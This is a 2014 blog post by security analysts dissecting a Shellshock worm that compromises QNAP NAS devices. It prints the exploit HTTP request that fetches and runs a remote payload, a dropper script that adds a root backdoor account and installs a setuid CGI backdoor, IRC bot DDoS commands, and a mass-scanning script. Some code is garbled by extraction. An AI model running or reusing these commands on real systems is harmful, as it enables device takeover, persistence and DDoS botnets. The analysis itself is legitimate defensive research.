Armed Qnap-NAS Botnet Revealed

Armed Qnap-NAS Botnet Revealed

In addition of this analyses.

Worm Backdoors and Secures QNAP Network Storage Devices

Shellshock Worm Exploiting Unpatched QNAP NAS Devices

A little ShellShock fun

This is what we found.

Like always our publication is short but right into point.

The attackers are sending a GET request with Shellshock exploit to all IP ranges around the Internet. The successfully hacked NAS devices are forced to download a payload from Internet, this payload contains a SH script with very clever design logic specially build for QNAP NAS devices. The payload downloads the ELF Linux installer package with BOT functionality for DDOS. From this point the attacker is building persistence with script inside the compromised NAS device.

Another interesting founding is that attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this attacker prevents other hackers to own the already hacked NAS device.

Adding a “’request” user with root privileges into he “passwd” and “shadow” file is classical approach to own a Linux machine. The real aim of this massive hack is, at the script “armgH.cgi” that attacker is downloading and installing into the compromised machine.

This CGI Backdoor ready NAS becomes an armed device ready for DDOS.The whole attack schematic is design to be continuous with auto pilot mode.

So far we managed to detect more than 500+ compromised devices.

Screen Shot 2014-12-17 at 09.47.43-> Massive Attack -> Deploying Payload -> Patching against Shellshock (persistence) -> Arming -> Deploy the scanner ->


Attack Exploit in the wild.

GET /cgi-bin/authLogin.cgi HTTP/1.1Host: () { :; }; /bin/rm -rf /tmp/ && /bin/mkdir -p /share/HDB_DATA/…/php && /usr/bin/wget -c http://xxx.14.xx.79/ /tmp && /bin/sh /tmp/ 0<&1 2>&1500HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length:2250Date: Sat, 13 Dec 2014 22:09:42 GMTServer: header”>HTTP Status 404 – /cgi-bin/authLogin.cgi

Payload – Hosted in compromise server!

#!/bin/sh export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY os=`uname -m` -P /tmp/ ; cd /tmp/ ;chmod +x ; sh # # fold=/share/MD0_DATA/optware/.xpl/ if [[ “$os” == ‘armv5tel’ ]]; thenwget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi chmod 4755 /home/httpd/cgi-bin/armgH.cgi mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi sleep 1 Search=”request”Files=”/etc/passwd” if grep $Search $Files; then   

echo “$Search userits just added!”else          

echo “request:x:0:0:request:/share/homes/admin:/bin/sh” >> /etc/passwdecho ‘request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7::: >> /etc/shadow#inst patch

wget -P /mnt/HDA_ROOT/update_pkg/

#inst scan

sfolder=”/share/HDB_DATA/…/” url69=http://xx.xx.xx.79/run


 Arming the NAS devices for DDOS attacks.

Hosted in compromise server “armgH.cgi -ELF Linux backdoor with IRC client and DDOS capability.

Output from – Reverse engineering analyses.

PRIVMSG %s :* .exec – execute a system commandPRIVMSG %s :* .version – show the current version of botPRIVMSG %s :* .status – show the status of botPRIVMSG %s :* .help – show this help messagePRIVMSG %s :* *** Scan CommandsPRIVMSG %s :* .advscan – scan with user:pass (A.B) classes sets by youPRIVMSG %s :* .advscan – scan with d-link config reset bugPRIVMSG %s :* .advscan->recursive – scan local ip range with user:pass, (C.D) classes randomPRIVMSG %s :* .advscan->recursive – scan local ip range with d-link config reset bugPRIVMSG %s :* .advscan->random – scan random ip range with user:pass, (A.B) classes randomPRIVMSG %s :* .advscan->random – scan random ip range with d-link config reset bugPRIVMSG %s :* .advscan->random->b – scan local ip range with user:pass, A.(B) class randomPRIVMSG %s :* .advscan->random->b – scan local ip range with d-link config reset bugPRIVMSG %s :* .stop – stop current operation (scan/dos)PRIVMSG %s :* *** DDos Commands:PRIVMSG %s :* NOTE: to 0 = random ports, to 0 = random spoofing,PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secsPRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86PRIVMSG %s :* .spoof – set the source address ip spoofPRIVMSG %s :* .synflood – tcp syn flooderPRIVMSG %s :* .ngsynflood – tcp ngsyn flooder (new generation)PRIVMSG %s :* .ackflood <host> <port> <secs> – tcp ack flooderPRIVMSG %s :* .ngackflood – tcp ngack flooder (new generation)PRIVMSG %s :* *** IRC Commands:PRIVMSG %s :* .setchan – set new master channelPRIVMSG %s :* .join – join bot in selected roomPRIVMSG %s :* .part – part bot from selected roomPRIVMSG %s :* .quit – kill the current process

Screenshot from hacked NAS device with deployed payload can be controlled via CGI web backdoor



 Mass scanner for Shellshock

This script is taken from a compromised NAS device. Attacker is using “pscan” multi threaded port scanner to search and hack for other vulnerable Qnap NAS devices.

#!/bin/sh## xXx@code 3-12-2014rand=`echo $((RANDOM%255+2))`#url=””url=”http://xxx.14.xx.xx/; download=”/bin/rm-rf /tmp/ && /bin/mkdir-p /share/HDB_DATA/…/php && /usr/bin/wget-c $url-P /tmp && /bin/sh /tmp/ 0<&1 2>&1 nnn”get=”GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: () { :; }; $download nnn” ./pnscan -rQDoc   -w”$get “-t500 -n300 $rand.0.0.0: 8080 > /dev/null &

Senad Aruch

Multiple Certified ISMS Professional with 10-year background in: IT Security, IDS and IPS, SIEM, SOC, Network Forensics, Malware Analyses, ISMS and RISK, Ethical Hacking, Vulnerability Management, Anti Fraud and Cyber Security. Currently holding a Senior Lead position.


Davide Cioccia

MSc Computer Engineering Degree. Security Developer focused on Cyber Security Intelligence, Malware analysis, Anti-fraud systems. Microsoft certified. Currently holding a Security Consultant position.


Create a free website or blog at

Up ↑